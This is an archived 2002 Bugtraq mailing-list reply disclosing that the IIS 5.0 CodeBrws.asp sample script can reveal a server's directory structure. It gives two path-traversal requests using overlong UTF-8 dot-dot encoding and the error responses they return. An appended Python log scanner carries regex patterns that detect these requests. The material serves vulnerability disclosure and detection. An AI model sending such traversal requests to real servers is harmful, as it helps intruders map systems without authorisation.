[25115] in bugtraq
Re: Microsoft IIS 5.0 CodeBrws.asp Source Disclosure
daemon@ATHENA.MIT.EDU (Joe Testa)
Wed Apr 17 17:59:05 2002
Message-ID: <3CBDBA0E.6030402@rapid7.com>
Date: Wed, 17 Apr 2002 14:08:14 -0400
From: Joe Testa <jtesta@rapid7.com>
MIME-Version: 1.0
To: H D Moore <sflist@digitaloffense.net>, bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
This vulnerability can also be used to determine the directory structure
of an affected system.
When an attempt is made to access a non-existent ASP file outside the
'IISSamples' root, CodeBrws.asp will respond differently based on whether or
not the path to the file is valid.
Below is an example:
Request:
http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
Response: Microsoft VBScript runtime (0x800A004C) Path not found
Request:
http://192.168.x.x/IISSamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/oracle/nonexistant.asp
Response: Microsoft VBScript runtime (0x800A0035) File not found
Credits go to Tas Giakouminakis for discovering this.
- Joe Testa
GPG key: http://www.cs.rit.edu/~jst3290/joetesta_r7.pub
A22B 2683 C40E 5443 AE52 AD6D 65B2 F5DF 4B11 06B4
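
A defender-side check for the requests described in this message, as an added example that is not part of the original post: it scans W3C extended log records for CodeBrws.asp requests whose Source value contains overlong UTF-8 such as %c0%ae, and generalizes to any %c0/%c1 lead byte and to plain or %2e-encoded dot-dot segments. The log lines, addresses and the function names are constructed for illustration, and it assumes the server logs cs-uri-query as received, without decoding.

```python
import re

# %c0 and %c1 lead bytes only occur in overlong two-byte UTF-8, which is never
# valid; %c0%ae (overlong '.') is the sequence used in the requests above.
OVERLONG = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)
DOTDOT = re.compile(r"(?:^|[/\\])(?:\.|%2e){2}(?:[/\\]|$)", re.IGNORECASE)
TARGET = "/iissamples/sdk/asp/docs/codebrws.asp"

# Constructed sample log (addresses and the sample.asp / x.asp paths are made up).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query
2002-04-17 18:01:02 10.0.0.5 GET /IISSamples/sdk/asp/docs/CodeBrws.asp Source=/IISSAMPLES/%c0%ae%c0%ae/%c0%ae%c0%ae/bogus_directory/nonexistent.asp
2002-04-17 18:01:09 10.0.0.7 GET /IISSamples/sdk/asp/docs/CodeBrws.asp Source=/IISSamples/sdk/asp/docs/sample.asp
2002-04-17 18:01:15 10.0.0.9 GET /default.asp -
2002-04-17 18:01:20 10.0.0.5 GET /iissamples/sdk/asp/docs/codebrws.asp source=/IISSAMPLES/%C0%AE%C0%AE/oracle/x.asp
"""

def parse_w3c(text):
    """Yield one dict per record, naming columns from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
        elif line.strip() and not line.startswith("#"):
            values = line.split()
            if fields and len(values) == len(fields):
                yield dict(zip(fields, values))

def source_param(query):
    """Return the raw, still percent-encoded Source= value, or None."""
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        if name.lower() == "source":
            return value
    return None

def flag_requests(text):
    """Return (client, source, reasons) for CodeBrws.asp requests whose
    Source value carries overlong UTF-8 or dot-dot segments."""
    hits = []
    for rec in parse_w3c(text):
        if rec.get("cs-uri-stem", "").lower() != TARGET:
            continue
        src = source_param(rec.get("cs-uri-query", ""))
        if src is None:
            continue
        reasons = [name for name, rx in (("overlong-utf8", OVERLONG), ("dot-dot", DOTDOT))
                   if rx.search(src)]
        if reasons:
            hits.append((rec["c-ip"], src, reasons))
    return hits
```

Repeated hits from one client with varying directory names in the Source value are the pattern to look for, since each request tests one path.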